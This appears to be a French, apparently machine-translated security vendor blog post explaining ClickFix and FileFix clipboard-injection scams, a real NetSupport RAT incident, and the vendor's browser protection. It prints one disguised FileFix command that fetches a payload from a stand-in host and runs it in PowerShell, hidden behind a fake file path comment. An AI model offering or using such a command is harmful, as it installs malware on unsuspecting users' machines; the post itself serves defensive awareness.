Un aperçu d’une campagne ClickFix et d’une attaque réelle, de sa prochaine itération (FileFix) et de la manière de l’empêcher de suivre son cours, avant la compromission de l’appareil.

ClickFix: Copie silencieuse dans le Presse-papiers
ClickFix, une tactique d’ingénierie sociale trompeuse, est utilisée par les acteurs de la menace pour manipuler les utilisateurs sans méfiance afin qu’ils autorisent involontairement une page Web à remplir silencieusement le presse-papiers.

En fin de compte, l’attaquant tente d’amener un utilisateur à exécuter (sans le savoir) du code malveillant, collecté à partir du navigateur et placé discrètement dans le presse-papiers de l’utilisateur, sur la machine hôte.

Initialement appelé « ClickFix » parce que les invites d’ingénierie sociale indiquaient à l’utilisateur qu’il devait “résoudre” un problème avec son navigateur et obligeaient l’utilisateur à cliquer sur un élément, ce terme est désormais attribué à toute attaque similaire, dans laquelle un utilisateur clique sur un élément, la page remplit ensuite le presse-papiers de la victime et demande à l’utilisateur de coller le code malveillant dans le terminal de son appareil.

Images d’une attaque ClickFix déguisée en invite CAPTCHA.

Les captures d’écran ci-dessus montrent un exemple d’attaque ClickFix. Une fois que l’utilisateur clique sur le faux CAPTCHA, la page remplit silencieusement le presse-papiers de l’utilisateur avec du code malveillant. Il affiche ensuite des instructions pour que l’utilisateur prouve qu’il est humain—en collant (le code malveillant) dans la boîte de dialogue Exécuter de Windows.

Pour plus d’informations sur ClickFix, consultez notre article expliquant le quoi, pourquoi, où et comment de ClickFix.

Attaque du monde réel: Résultat Google pour tenter de corriger les clics
Un client Keep Aware a récemment rencontré une attaque ClickFix dans la nature. Lors de la navigation dans les résultats des moteurs de recherche, l’utilisateur a cliqué sur un site compromis. Ce site, injecté de JavaScript malveillant, a fourni une invite de correction de clic, en fin de compte dans le but de déployer la porte dérobée RAT NetSupportManager.

L’utilisateur avait cliqué sur l’invite, permettant à la page de remplir le presse-papiers (avec PowerShell malveillant) et demandant à l’utilisateur de coller dans le terminal de l’appareil.

Cependant, Keep Aware a identifié, bloqué et averti l’utilisateur des commandes suspectes avec lesquelles la page tentait de remplir le presse-papiers, empêchant ainsi efficacement la compromission de l’appareil.

La vidéo ci—dessous décrit l’expérience des visiteurs sur ce site compromis-un faux cadre de vérification CAPTCHA. En cliquant sur le faux CAPTCHA, JavaScript malveillant met à jour le presse-papiers de l’utilisateur avec du code PowerShell malveillant et invite l’utilisateur à le coller dans la boîte de dialogue Exécuter Windows.

Vous trouverez ci-dessous un aperçu de ce qui se serait passé si les protections de Keep Aware n’étaient pas en place pour limiter les actions de l’utilisateur et effacer le presse-papiers de l’utilisateur.

Si la tactique d’ingénierie sociale avait réussi et qu’aucun contrôle technique n’avait été en place, l’utilisateur aurait exécuté sans le savoir du code PowerShell malveillant.

Cela déclenche une série de téléchargements, de suppression de l’obscurcissement, d’assemblage de logiciels malveillants sur la machine hôte et de configuration de la persistance dans la clé de registre d’exécution de l’utilisateur-permettant au logiciel malveillant de persister sur l’appareil compromis et de s’exécuter chaque fois que l’utilisateur se connecte à son compte d’ordinateur.

Pour obtenir des détails spécifiques sur cette attaque réelle, y compris à la fois le berceau de téléchargement initial et le code PowerShell ultérieur, consultez notre procédure pas à pas.

Impact: Rats, voleurs et plus encore
Les attaques ClickFix utilisent du JavaScript malveillant, la manipulation du presse-papiers et l’ingénierie sociale pour finalement permettre à l’attaquant d’accéder du navigateur au périphérique hôte.

Il a été vu sur des pages Web malveillantes et compromises et a été utilisé par plusieurs groupes de menaces pour accéder aux machines des victimes, déployant finalement des logiciels malveillants et des chevaux de Troie d’accès à distance (RATs), notamment AsyncRAT, Skuld Stealer, Lumma Stealer, DarkGate malware, Danabot stealer, et plus.

Lorsqu’elles ne sont pas découragées par les défenses techniques, ces attaques apparemment simples du presse-papiers peuvent dégénérer en compromission de l’ensemble du système, donnant aux auteurs de menaces un contrôle à distance, un accès aux données sensibles et des points d’ancrage persistants difficiles à détecter et encore plus difficiles à supprimer.

La prochaine génération: FileFix
FileFix est la prochaine itération, la plus jeune, de ClickFix—une autre attaque de manipulation du presse-papiers conçue pour inciter les utilisateurs à exécuter du code en dehors du contexte du navigateur. Documenté pour la première fois par le chercheur en sécurité m. d0x à la fin du mois de juin de cette année, FileFix incite les utilisateurs à coller des commandes directement dans la barre d’adresse de l’Explorateur de fichiers, et les auteurs de menaces adoptent déjà cette nouvelle technique.

En un coup d’œil, la sortie collée semble inoffensive, comme un chemin de fichier Windows standard. Mais caché au début est une commande malveillante; le « chemin du fichier » qui suit est un commentaire, déguisant la menace réelle.

Powershell.exe -c "iwr malicious[.]site/mal.jpg|iex" #                                                                                          C:\Organization\Internal\Drive\Business-RFP.pdf

Les données complètes copiées dans le presse-papiers de l’utilisateur sont une commande PowerShell malveillante se terminant par un commentaire contenant un chemin de fichier.

Remarquez dans l’image ci-dessous comment le chemin de fichier apparemment inoffensif dans la barre d’adresse de l’Explorateur n’affiche pas le PowerShell réel est masqué à la vue de l’utilisateur.

Explorateur de fichiers, ouvert par un onglet Chrome.

Comme ClickFix, l’attaque FileFix provient du navigateur et repose sur l’ingénierie sociale, l’injection dans le presse-papiers et l’action de l’utilisateur pour franchir la frontière entre le navigateur et l’hôte. FileFix est, à la base, une attaque ClickFix spécifique à l’utilisation de l’Explorateur de fichiers.

  • Les deux se produisent dans le contexte du navigateur.
  • Les deux utilisent la même technique de population de presse-papiers.
  • Les deux exploitent des sites Web malveillants et compromis, brouillant la frontière entre le trafic Web fiable et malveillant.
  • Les deux conduisent à un accès attaquant sur le périphérique hôte.

Cela signifie que FileFix peut être arrêté de la même manière que ClickFix: avec des défenses natives du navigateur. Les solutions de sécurité du navigateur, telles que Keep Aware, détectent les tentatives de population du presse-papiers en temps réel et interceptent le code suspect avant qu’il n’atteigne le périphérique hôte. C’est pourquoi le fait d’avoir des politiques intégrées au navigateur garantit que les compromis sont tenus à distance.

La Sécurité du Navigateur Prend la scène Principale
Les attaques ClickFix et FileFix révèlent un angle mort critique dans de nombreuses stratégies de sécurité: le navigateur en tant que vecteur de compromission de l’hôte. Ces techniques basées sur le presse-papiers utilisent l’ingénierie sociale et abusent de l’interaction de l’utilisateur avec des sites Web apparemment légitimes, voire compromis, pour fournir du code malveillant.

Sans visibilité sur l’activité du navigateur ou contrôle sur l’accès au presse-papiers, les défenses traditionnelles manquent les premiers signes. Mais avec des informations natives sur le navigateur et une protection du presse-papiers en temps réel, les organisations peuvent intercepter ces attaques à leur source, avant que tout code ne soit exécuté sur l’hôte.

Chez Keep Aware, nous avons constaté de première main à quel point les outils de sécurité traditionnels ne suffisent pas à protéger le navigateur—l’interface principale sur laquelle les employés comptent et que les attaquants exploitent. C’est pourquoi nous avons construit notre plate-forme: pour détecter et bloquer la manipulation du presse-papiers et d’autres attaques basées sur le navigateur avant qu’elles ne puissent causer de réels dommages.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *